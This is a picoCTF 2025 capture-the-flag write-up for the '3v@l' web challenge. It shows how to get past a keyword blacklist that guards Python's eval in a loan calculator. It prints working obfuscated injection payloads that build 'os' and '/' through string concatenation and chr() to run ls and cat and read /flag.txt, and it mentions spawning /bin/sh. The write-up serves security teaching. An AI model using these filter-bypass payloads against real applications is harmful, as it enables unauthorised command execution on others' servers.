picoCTF Solutions
picoCTF 2025Web ExploitationMedium

3v@l

Published: April 2, 2025Updated: December 9, 2025

Description

ABC Bank’s loan calculator naively feeds user input to Python’s eval while blocking a short keyword list. Build around the filter to execute shell commands and read /flag.txt.

Setup

Open calculator

Load the calculator page and inspect the script block; keywords like os, eval, ls, cat, /, etc. are blacklisted.

Craft Python expressions with string concatenation and chr() so the filter fails to spot forbidden tokens.

__import__('o'+'s').popen('l'+'s').read()
__import__('o'+'s').popen('c'+'at '+chr(47)+'*').read()

Solution

  1. Step 1Bypass the filter
    Instead of typing os directly, build it dynamically (`'o'+'s'`) and likewise for commands. chr(47) gives `/`, enabling path traversal without literal slashes.
  2. Step 2Dump the filesystem
    List the root directory (`ls /`) to confirm flag.txt, then run a cat payload (e.g., `__import__('o'+'s').popen('c'+'at '+chr(47)+'flag.txt').read()`) to output the flag.

Flag

picoCTF{D0nt_Use_Unsecure_f@nctionsd06...}

Any payload that spawns /bin/sh via the obfuscated os import works; the concatenation trick keeps the blacklist asleep.